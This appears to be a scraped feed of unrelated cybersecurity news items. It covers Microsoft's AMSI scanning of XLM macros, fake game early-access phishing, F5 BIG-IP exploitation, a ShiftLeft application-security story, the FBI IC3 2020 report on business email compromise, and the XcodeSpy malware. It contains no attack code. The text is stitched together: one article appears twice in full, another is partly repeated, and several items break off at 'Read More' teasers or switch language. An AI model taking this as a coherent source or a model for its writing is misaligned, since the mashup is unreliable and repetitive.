Macros have been a simple, effective means of spreading malware since the 1990’s, and some hackers still rely on them heavily to ensnare and infect unsuspecting users.
It’s a long standing issue that many companies have attempted to address over the years. Now, it seems that it’s Microsoft’s turn at bat again.
Recently, the Redmond Giant announced a new integration between its AMSI (Antimalware Scan Interface) and Office 365, aimed squarely at delivering a knockout blow to macro-based malware.
Earlier attempts to put a stop to macro abuse focused on Visual Basic Scripts and removing macro-based vulnerabilities from them.
That was effective as far as it went, but it had the unforeseen effect of pushing hackers away from using VBS and toward XLM. Those are of an older macro language that first shipped with Microsoft Excel back in 1992 and is still supported to this day. The new integration paradigm sees AMSI scanning Excel 4.0 XLM macros at runtime, which should (emphasis on should) make it virtually impossible for hackers to exploit them.
As a representative from Microsoft Security Teams explains:
“While more rudimentary than VBA, XLM is powerful enough to provide interoperability with the operating system, and many organizations and users continue to use its functionality for legitimate purposes. Cyber criminals know this, and they have been abusing XLM macros, increasingly more frequently, to call Win32 APIs and run shell commands.
Naturally, threat actors like those behind Trickbot, Zloader, and Ursnif have looked elsewhere for features to abuse and operate under the radar of security solutions, and they found a suitable alternative in XLM.”
Time will tell how effective this new approach will be. Unfortunately, even if it is wildly successful, it will simply push hackers toward some other easy exploit. Even so, kudos to Microsoft for taking the fight to the hackers.
There’s been a number of scams targeting fans of major upcoming video game releases over the last week or two. Why is this happening, and what can you do to ensure both you and your children avoid such fakeouts?
When net-connected consoles blasted their way into homes from around the time of the original Xbox onward, this granted a second life to the old cover tapes and discs. Consoles came with demos pre-loaded, you could download demos or full games, and update purchased titles on the fly.
Consoles going digital slowly came with its own problems. Even so, the digital download revolution encouraged new funding models and ways to play games. Early access, where players are granted first look at a title by paying or for free, is where our latest scam lies.
What are the scammers doing?
Scammers are using demos and early access promises as bait for phishing and other forms of attack. The upcoming Resident Evil title, Village, currently has a spin-off demo version called “Maiden” on the Playstation 5 with other versions to follow. Enterprising phishers are distributing fake mails offering “Early access invitations” to play Village itself, which is the full game, set after the events of Maiden.
In this way, they’re trying to ride the wave of popularity for Maiden by encouraging people to get their hands on the rest of the content. The game developers, Capcom, also mention avoiding any files offered up by the phish. This sounds very much like the phishers were also dabbling in malware distribution.
We bring tidings. Bad tidings.
The full Capcom message sent to press reads as follows:
We’re sending this message as we’ve been made aware that there are currently emails circulating that pretend to contain “Early Access invitations” to Resident Evil Village. The sender address is being displayed as “no-reply(at)capcom(dot)com”.
We want to inform you that these messages are NOT from Capcom and appear to be phishing attempts by an unauthorized third party. If you have received such a message, please DO NOT download any files or reply, and delete the message immediately.
If you are unsure of the authenticity of correspondence from Capcom, please contact us directly to verify.
This is perfect bait for younger gamers who may not be aware of this type of scam attempt. No doubt it’ll have caught out many an adult gamer, too. That’s the most recent attempt at tricking people with fake early access. Shall we take a look at a slightly earlier effort?
Fake Beta build scammers come for Far Cry
Far Cry 6 is the soon to be released entry into Ubisoft’s unstoppable game series. Last month, a supposed “beta” build of the game was mentioned in emails to various influencers / content creators in the gaming space. The mail, flagged as being under embargo, comes complete with an access password. When the password is entered, and we’re not sure if they mean to open a zip or on a fake website, an infection is downloaded to the PC. According to potential victims, it “watches your screen and records everything you do”.
That’s bad enough. This is by no means the end of the wave of fake beta/early access/demo invites though.
Gaming a wide audience
In January, THQ Nordic warned of scam mails related to their game Biomutant. As with the other missives, it seems to focus on content creators / developers. Seeing developers state that no early builds of games are being mailed to people is bad news. Could one group specifically be trying this early access build gimmick? Or is everyone at it? Quite often, a new way to go on the offensive is posted to underground forums and then people go off and try it. That could be what is happening with these attacks, or it could just be coincidence.
At least some of these attacks are targeted towards gaming influencers or people with big platforms. As a result, this means you may not encounter a few of them. If you do fall into this category, basic security hygiene applies. Check the security of all your accounts and enable two-factor authentication if it’s available. Run up to date security software, and ensure all your devices are patched and up to date.
Begin locking down your gaming accounts if you haven’t already. It might not just be your PC at risk from attacks. They could be after your console logins / details too. All major gaming consoles have plenty of security features. It’s well worth digging out their security documentation and shoring up any gaps in your defence.
If a games developer emails you out of the blue, it’s fairly easy to figure out what’s real and what isn’t. Major titles announce betas, and early access programs clearly on websites, social media, and gaming portals. It isn’t left to random mail shots and mysterious attachments. If there’s no evidence of whatever you’ve been sent in some sort of official capacity, steer clear. Worst case scenario, you can always contact most developers on social media. They will likely be happy to help if what you’re showing them is a scam.
Press X to continue?
We recommend telling younger gamers in your household about these scams, and also the security solutions used to address them. The “exclusive preview build” technique aimed at influencers probably won’t remain aimed at them exclusively for very long, so watch out for that. You may as well get ahead of the game now before the inevitable next wave of beta invite scams land in mailboxes near you. There’s always something to think about in video game land.
Almost 10 days after application security company F5 Networks released patches for critical vulnerabilities in its BIG-IP and BIG-IQ products, adversaries have begun opportunistically mass scanning and targeting exposed and unpatched networking devices to break into enterprise networks.
News of in the wild exploitation development comes on the heels of a proof-of-concept exploit code that Read More
Almost 10 days after application security company F5 Networks released patches for critical vulnerabilities in its BIG-IP and BIG-IQ products, adversaries have begun opportunistically mass scanning and targeting exposed and unpatched networking devices to break into enterprise networks.
News of in the wild exploitation development comes on the heels of a proof-of-concept exploit code that surfaced online earlier this week by reverse-engineering the Java software patch in BIG-IP. The mass scans are said to have spiked since March 18.
The flaws affect BIG-IP versions 11.6 or 12.x and newer, with a critical remote code execution (CVE-2021-22986) also impacting BIG-IQ versions 6.x and 7.x. CVE-2021-22986 (CVSS score: 9.8) is notable for the fact that it’s an unauthenticated, remote command execution vulnerability affecting the iControl REST interface, allowing an attacker to execute arbitrary system commands, create or delete files, and disable services without the need for any authentication.
Successful exploitation of these vulnerabilities could lead to a full compromise of vulnerable systems, including the possibility of remote code execution as well as trigger a buffer overflow, leading to a denial of service (DoS) attack.
While F5 said it not aware of any public exploitation of these issues on March 10, researchers from NCC Group said they have now found evidence of “full chain exploitation of F5 BIG-IP/BIG-IQ iControl REST API vulnerabilities CVE-2021-22986” in the wake of multiple exploitation attempts against its honeypot infrastructure.
Additionally, Palo Alto Networks’ Unit 42 threat intelligence team said it found attempts to exploit CVE-2021-22986 to install a variant of the Mirai botnet. But it’s not immediately clear if those attacks were successful.
Given the popularity of BIG-IP/BIG-IQ in corporate and government networks, it should come as no surprise that this is the second time in a year F5 appliances have become a lucrative target for exploitation.
Last July, the company addressed a similar critical flaw (CVE-2020-5902), following which it was abused by Iranian and Chinese state-sponsored hacking groups, prompting the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to issue an alert cautioning of a “broad scanning activity for the presence of this vulnerability across federal departments and agencies.”
“The bottom line is that [the flaws] affect all BIG-IP and BIG-IQ customers and instances — we urge all customers to update their BIG-IP and BIG-IQ deployments to the fixed versions as soon as possible,” F5 Senior Vice President Kara Sprague noted last week.
Found this article interesting? Follow THN on Facebook, Twitter and LinkedIn to read more exclusive content we post.
Ryuk is one of the deadliest ransomware out there, and now has worm capabilities to infect networks. Here’s a detailed analysis of the new variant.
Try Malwarebytes Privacy: https://go.malwarebytes.com/privacy?utm_campaign=DPD_JFL&utm_content=1611856299&utm_medium=social&utm_source=Malwarebytes
Buy the best antivirus/security products with exclusive discounts and support this channel:
https://www.thepcsecuritychannel.com/buy
Join our community on Discord:
http://discord.tpsc.tech/
Contact us for business enquires: https://thepcsecuritychannel.com/contact
Hello and welcome to Sec Soup, where the weekly newsletter has a collection of infosec links to Tools & Tips, Threat Research, and more! The focus trends toward DFIR and threat intelligence, but general information security and hacking-related topics are included as well. This list is not vetted nor intended to be an exhaustive source. Keeping up with the enormous volume of security-related information is a daunting task, but this is my way of filtering the most useful items and improving the signal to noise ratio. Happy Reading!
Application Security for builders and creators — part 2
Previously on Application Security for builders and creators — Alice and Bob wanted to build a vaccine passport app with go micro-services and a React UI. Claire suggests the team to engineer security into their app with ShiftLeft.
Review with AppSec on Zoom
ShiftLeft findings Review on Zoom
“Claire, let’s jump right in to the topic for today,” said Bob as he hurriedly looked for the screen-sharing button to share the ShiftLeft dashboard UI with Alice and Claire on Zoom.
ShiftLeft NG SAST dashboard for passport app
“What do you mean my git branch has20 SQL Injection and 6 XSS vulnerabilities?” queried Bob. Before Claire could unmute herself, Bob continued, “For Sensitive Data Leaks I’m logging the payload in dev which I can turn off when the app goes live. As you might know we are planning to use docker and host the micro-services on Google Kubernetes Engine (GKE). All our CDN endpoints are behind Cloudbare WAF. Should we still treat these SQLi findings as critical?”
Claire started with the usual icebreaker, “Can you hear me?”.
She added, “It’s a strong argument Bob. Thank you for sharing the details on the application infrastructure for your app. But unfortunately, docker or GKE while being excellent virtualization and orchestration technology, cannot protect an application against SQL injection or any application-specific vulnerabilities”.
Showing empathy and emotional intelligence are quite key while discussing security topics with developers. Instead of blaming Bob or making fun of his work, Claire started the conversation by thanking Bob.
“Yeah, you are right, Claire!” declared Bob. “But surely that expensive WAF can stop the injection attacks, right?”
Claire continued, “Ideally yes! But recently, we had an issue with Tracey’s apps. They suddenly stopped working so as a workaround we run our Cloudbare WAF in monitor-only mode in production”.
“WHAT!!!” Alice and Bob screamed spontaneously.
“Why are you feeling shocked? It is quite common to run WAF and other runtime security tools in monitor-only mode. The idea is that over time every one would feel confident to let the security tool to block malicious traffic and payload automatically. But that may never happen soon enough since the risk of losing a legitimate traffic and business usually outweighs missing an occasional malicious traffic,” concluded Claire.
There was silence even though everyone were clearly unmuted. The team learnt the hard reality of those cloud infrastructure security tools — they run in monitor-mode and produce alerts that someone else has to review periodically. The person reviewing the alerts, usually from a SOC team, may not have the necessary engineering or even security experience to differentiate a malicious injection attempt from a genuine API request with JSON or gRPC payload.
Threat modelling for busy developers
Bob is a polyglot developer who has recently been juggling with go and TypeScript. He is also involved with configuring Helm charts and ensuring the Kubernetes namespaces on Google Cloud are optimized for zero downtime deployments and even canary deployments.
When a developer is this busy, expecting them to think about the Threat Modelling and those textbook recommended STRIDE and other frameworks is ambitious. Offering security training to busy developers in the form of a learning academy is a good idea. Claire decided to help the team by opting to author Threat scenarios in gherkin language which developers could readily understand. Some example scenarios are below:
As a user of passport api When I change the id in the request Then I should not be allowed to view other user's data
As a user of passport api When I change the folder name used for the bucket Then I should not be allowed to download other user's files
As a user of passport UI When I use a different email instead of mine Then I should not be allowed to reset the password for other users
By collaboratively authoring threat scenarios, busy developers like Bob understood the importance of including security elements in the code instead of entirely relying on external infrastructure such as Kubernetes or WAF to secure their application. Scenarios combined with a diagram helps them to visualize the threat blast radius and understand the roles and responsibilities of developers, AppSec and SOC teams — Security is a shared responsibility after all.
Bob agreed to review the findings on ShiftLeft and incorporate additional checks based on the threat scenarios. Claire meanwhile, configured ShiftLeft analysis to lower the severity of Sensitive Data Leaks category to Info by using modify-findings CLI command as explained here.
Developer experience with ShiftLeft
As Bob started playing with ShiftLeft, he realized that ShiftLeft NG SAST is not a bad tool after all. As he navigated to the SQL Injection category, he saw that ShiftLeft was presenting the entire vulnerable data flow as evidence.
ShiftLeft NG SAST dev experience
The source of the SQL Injection were either the http middleware or the user’s cookie. The sink in case of an SQL Injection is the database library code that was interacting with the database which could be both Relational or NoSQL (Aka. NoSQL Injection). Bob had not thought about validating or sanitizing the user inputs while working under pressure.
By presenting, the file and method information ShiftLeft helped Bob to resolve all the SQL Injection vulnerabilities on the same day itself!
Shifting-Left improves dev productivity
By pointing out application vulnerabilities in a specific branch, ShiftLeft NG SAST helped Bob not only to address the current set of findings but also gave him an idea to build new endpoints that will not generate any SQL Injection vulnerabilities in the future. After all, once a common validation or sanitization method is developed every endpoint that gets the user input could reuse the same methods or even the middleware. Bob even published his validation methods as a common library to help other teams in their organization. Well done!
After remediating the SQL Injection vulnerabilities, Bob and Alice turned their attention to Cross-Site scripting (XSS). Using the React framework for the UI was after all Alice’s idea; the documentation page on React claims that the framework automatically sanitizes user input reducing the opportunities for XSS. Yet, here ShiftLeft is claiming that there are 6 XSS vulnerabilities in the app. How is this possible? Whom do you trust — ShiftLeft the Application Security expert or React documentation from Facebook?
The team decides to have another call with Claire, their DevSecOps person, to discuss XSS vulnerabilities.
There’s been a number of scams targeting fans of major upcoming video game releases over the last week or two. Why is this happening, and what can you do to ensure both you and your children avoid such fakeouts?
When net-connected consoles blasted their way into homes from around the time of the original Xbox onward, this granted a second life to the old cover tapes and discs. Consoles came with demos pre-loaded, you could download demos or full games, and update purchased titles on the fly.
Consoles going digital slowly came with its own problems. Even so, the digital download revolution encouraged new funding models and ways to play games. Early access, where players are granted first look at a title by paying or for free, is where our latest scam lies.
What are the scammers doing?
Scammers are using demos and early access promises as bait for phishing and other forms of attack. The upcoming Resident Evil title, Village, currently has a spin-off demo version called “Maiden” on the Playstation 5 with other versions to follow. Enterprising phishers are distributing fake mails offering “Early access invitations” to play Village itself, which is the full game, set after the events of Maiden.
In this way, they’re trying to ride the wave of popularity for Maiden by encouraging people to get their hands on the rest of the content. The game developers, Capcom, also mention avoiding any files offered up by the phish. This sounds very much like the phishers were also dabbling in malware distribution.
We bring tidings. Bad tidings.
The full Capcom message sent to press reads as follows:
We’re sending this message as we’ve been made aware that there are currently emails circulating that pretend to contain “Early Access invitations” to Resident Evil Village. The sender address is being displayed as “no-reply(at)capcom(dot)com”.
We want to inform you that these messages are NOT from Capcom and appear to be phishing attempts by an unauthorized third party. If you have received such a message, please DO NOT download any files or reply, and delete the message immediately.
If you are unsure of the authenticity of correspondence from Capcom, please contact us directly to verify.
This is perfect bait for younger gamers who may not be aware of this type of scam attempt. No doubt it’ll have caught out many an adult gamer, too. That’s the most recent attempt at tricking people with fake early access. Shall we take a look at a slightly earlier effort?
Fake Beta build scammers come for Far Cry
Far Cry 6 is the soon to be released entry into Ubisoft’s unstoppable game series. Last month, a supposed “beta” build of the game was mentioned in emails to various influencers / content creators in the gaming space. The mail, flagged as being under embargo, comes complete with an access password. When the password is entered, and we’re not sure if they mean to open a zip or on a fake website, an infection is downloaded to the PC. According to potential victims, it “watches your screen and records everything you do”.
That’s bad enough. This is by no means the end of the wave of fake beta/early access/demo invites though.
Gaming a wide audience
In January, THQ Nordic warned of scam mails related to their game Biomutant. As with the other missives, it seems to focus on content creators / developers. Seeing developers state that no early builds of games are being mailed to people is bad news. Could one group specifically be trying this early access build gimmick? Or is everyone at it? Quite often, a new way to go on the offensive is posted to underground forums and then people go off and try it. That could be what is happening with these attacks, or it could just be coincidence.
At least some of these attacks are targeted towards gaming influencers or people with big platforms. As a result, this means you may not encounter a few of them. If you do fall into this category, basic security hygiene applies. Check the security of all your accounts and enable two-factor authentication if it’s available. Run up to date security software, and ensure all your devices are patched and up to date.
Begin locking down your gaming accounts if you haven’t already. It might not just be your PC at risk from attacks. They could be after your console logins / details too. All major gaming consoles have plenty of security features. It’s well worth digging out their security documentation and shoring up any gaps in your defence.
If a games developer emails you out of the blue, it’s fairly easy to figure out what’s real and what isn’t. Major titles announce betas, and early access programs clearly on websites, social media, and gaming portals. It isn’t left to random mail shots and mysterious attachments. If there’s no evidence of whatever you’ve been sent in some sort of official capacity, steer clear. Worst case scenario, you can always contact most developers on social media. They will likely be happy to help if what you’re showing them is a scam.
Press X to continue?
We recommend telling younger gamers in your household about these scams, and also the security solutions used to address them. The “exclusive preview build” technique aimed at influencers probably won’t remain aimed at them exclusively for very long, so watch out for that. You may as well get ahead of the game now before the inevitable next wave of beta invite scams land in mailboxes near you. There’s always something to think about in video game land.
Keith Gunderson, a pioneering philosopher of robotics, in his 1964 paper called “Descartes, La Mettrie, Language and Machines” captured this Robert Stoothoff translation of the 1637 Discourse: If there were machines which bore a resemblance to our bodies and imitated our actions as closely as possible for all practical purposes, we should still have two … Continue reading Descartes on AI: I Think, Therefore I Am… Not a Machine→
What was the Dust Bowl Disaster? The term Dust Bowl was coined in 1935 when an AP reporter, Robert Geiger, used it to describe the drought-affected south central United States in the aftermath of horrific dust storms. Although it technically refers to the western third of Kansas, southeastern Colorado, the Oklahoma Panhandle, the northern two-thirds … Continue reading SolarWinds is a Dust Bowl Disaster of Modern Computing→
Internet crime is ever present, and with the ongoing pandemic, levels of scams and fraud were exceptionally high in 2020. Opportunistic fraudsters didn’t give a second thought to riding the COVID-19 wave and preying upon those who are truly in need of help, or those who truly want to help.
The Internet Crime Complaint Center (IC3), an arm of the FBI where internet users can report online fraud crimes, recently released the 2020 Internet Crime Report, an annual report that contains high-level information on suspected fraud cases reported to them and their losses. A state-by-state statistical breakdown of these cases were included in an accompanying report, 2020 State Reports, that you can browse through here.
The IC3 has found that the three biggest complaints they received in 2020 are phishing scams, which garnered the highest number of complaints (241,342), ransomware (2,474), and, perhaps the most striking of these, Business Email Compromise (BEC) (19,369). It’s striking, not because of the number of complaints but because BEC scams recorded the highest total losses by victims, at roughly $1.8 billion USD. Although phishing led to the highest number of complaints, victims “only” lost $54 million USD, a fraction of the money lost to BEC scams.
According to IC3, BEC can also be called Email Account Compromise (EAC). It may or may not involve a layered attack, depending on how a threat actor can better mimic the person they’re spoofing, and how much their target employee would be able to buy into the overall deception.
It starts off with an email, either from a compromised account or spoofed address, to make it look like it originated from a particular sender. The threat actor, usually posing as a higher-up within a company, contacts a more junior employee in the company who is cleared to perform funds transfers. The attacker gives the junior employee a plausible but urgent instruction to make a large, confidential transfer of money to a fake supplier.
“In 2020, the IC3 observed an increase in the number of BEC/EAC complaints related to the use of identity theft and funds being converted to cryptocurrency,” according to the report. “In these variations, we saw an initial victim being scammed in non-BEC/EAC situations to include Extortion, Tech Support, Romance scams, etc., that involved a victim providing a form of ID to a bad actor. That identifying information was then used to establish a bank account to receive stolen BEC/EAC funds and then transferred to a cryptocurrency account.”
We remind businesses, regardless of sector, to be aware of BEC attack trends and be very vigilant in combatting it. BEC scams rely, in part, on the pressure that junior employees feel when asked to comply with demands from senior employees, and told not to alert anyone else. Employees should be empowered to seek advice and take the time they need.
Also, if your company doesn’t have an extra layer or two of authentication before the request to transfer money is green-lit, put one in place now. A phone or video call is ideal.
True, these steps introduce a bit of friction into your company processes, but a little inconvenience and delay could your company millions of dollars.
Good luck!
Other post(s) on the subject of business email compromise:
The simplistic question of “Will machines replace humans in a SOC” can be clearly answered with a NO, as I explained in my previous post. As the human attackers are required to evolve the attacking robots, blue team people are required to update the automated defenses.
But things change if the question is asked with some additional nuance. If you ask “will defense actions be automated end to end, from detection to response actions?”, it becomes a more interesting question to answer.
The scenario of automated threats that Anton described in his post will, IMO, require SOCs to put together some end to end automation. Having a human involved for every response will not scale to face those attacks. Humans will be responsible for creating those playbooks and monitor their performance, but they cannot be involved in their execution. We need SOC automation that allows us to detect, investigate and initiate response without human intervention. This is challenging, but we must get there at some point.
Andre Gironda commented on the LinkedIn post pointing to my blog post that even with the appropriate tools he still can’t fully automate simple phishing response. I could say he’s probably being too perfectionist or doing something wrong, but I actually believe him. I believe automation can provide value by reducing human effort in the SOC right now, but full automation, even for some specific threats, is still challenging. But we’ll have to get there if we want to stand a chance.
Grande parte de uma rede corporativa atual é composta de endpoints móveis, como laptops, tablets e telefones celulares. São dispositivos associados e não pertencentes ao domínio que requerem acesso aos ativos corporativos para realizar as operações diárias, um cenário comum …
XcodeSpy is latest example of growing attacks on software supply chain.
Researchers from SentinelOne have discovered new malware targeting developers of macOS apps in the latest sign of growing attacker interest in the software supply chain.
The malware, XcodeSpy, is disguised as a legitimate Xcode open source project called TabBarInteraction that provides macOS developers with code for animating the iOS Tab Bar based on user interaction.
“Xcode is an Integrated Development Environment [IDE] provided by Apple for developers to create software applications for all of Apple’s platforms,” says Philip Stokes, threat researcher at SentinelOne.
It is free to download and use and is chiefly used by developers to create apps for iPhone, iPad apps, and the Mac, he says.
XcodeSpy installs a variant of the EggShell backdoor on an Apple developer’s macOS system. The backdoor is designed to spy on the developer and has features for recording the victim’s camera, microphone, and keyboard activity. It also has the ability to download and upload files and to remain persistent on an infected system.
The malware is executed when a developer using the Trojanized version of the TabBarInteraction Xcode project launches what is known as the build target in Xcode. The XcodeSpy malware contacts the attacker’s command-and-control (C2) server and drops the EggShell backdoor on the development machine, SentinelOne said in a report this week.
“An Xcode project is a repository for all the files, resources, and information required to build one or more software products,” Stokes says. “A project contains all the elements used to build a product and maintain the relationships between those elements.”
Injecting malware into an Xcode project gives attackers a way to target developers and potentially backdoor the developer’s apps and the customers of those apps, he says. With XcodeSpy itself, though, the attackers appear to be only directly targeting the developers themselves, according to SentinelOne.
The security vendor said a sample of XcodeSpy was found on a US-based victim’s Mac in late 2020. The company’s report did not disclose the identity of the victim but described the organization as a frequent target of North Korean advanced persistent threat actors.
SentinelOne said it’s possible that XcodeSpy may have been targeted at a specific developer or group of developers. Or it is also possible that attackers are using the malware to collect information that can be launched in future attacks or to harvest AppleID credentials for the same purpose. The security vendor said so far it has not been able to find any other instances of doctored Xcode projects. But available telemetry suggests that other XcodeSpy projects exist, and developers need to be on the lookout.
Stokes says the malicious code is relatively easy to spot if developers know how to look for it. But the attackers have obfuscated the malware enough that it can evade detection by casual inspection, especially when new or inexperienced developers are using the doctored Xcode project.
“The simple technique for hiding and launching a malicious script used by XcodeSpy could be deployed in any shared Xcode project,” SentinelOne said in its report. “Consequently, all Apple developers are cautioned to check for the presence of malicious Run Scripts whenever adopting third-party Xcode projects.”
The malware is the latest example of attackers targeting the software supply chain and trusted technology partners, in general, to try and get at their customers. The SolarWinds breach disclosed last December has emerged as one of the most visible examples of how attackers can compromise a large number of organizations simultaneously by planting a backdoor in software from a vendor that all of them use.
Earlier this year, Google’s threat analysis group disclosed a wide-ranging North Korean threat campaign targeting security researchers working on vulnerability research at multiple organizations. Part of the campaign involved the threat actors tricking security researchers into working with a Visual Studio project that contained hidden malware.
Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year … View Full Bio
Researchers are reporting mass scanning for – and in-the-wild exploitation of – a critical-severity flaw in the F5 BIG-IP and BIG-IQ enterprise networking infrastructure. Read More
Buy the best antivirus/security products with exclusive discounts and support this channel:
Contact us for business enquires: https://thepcsecuritychannel.com/contact
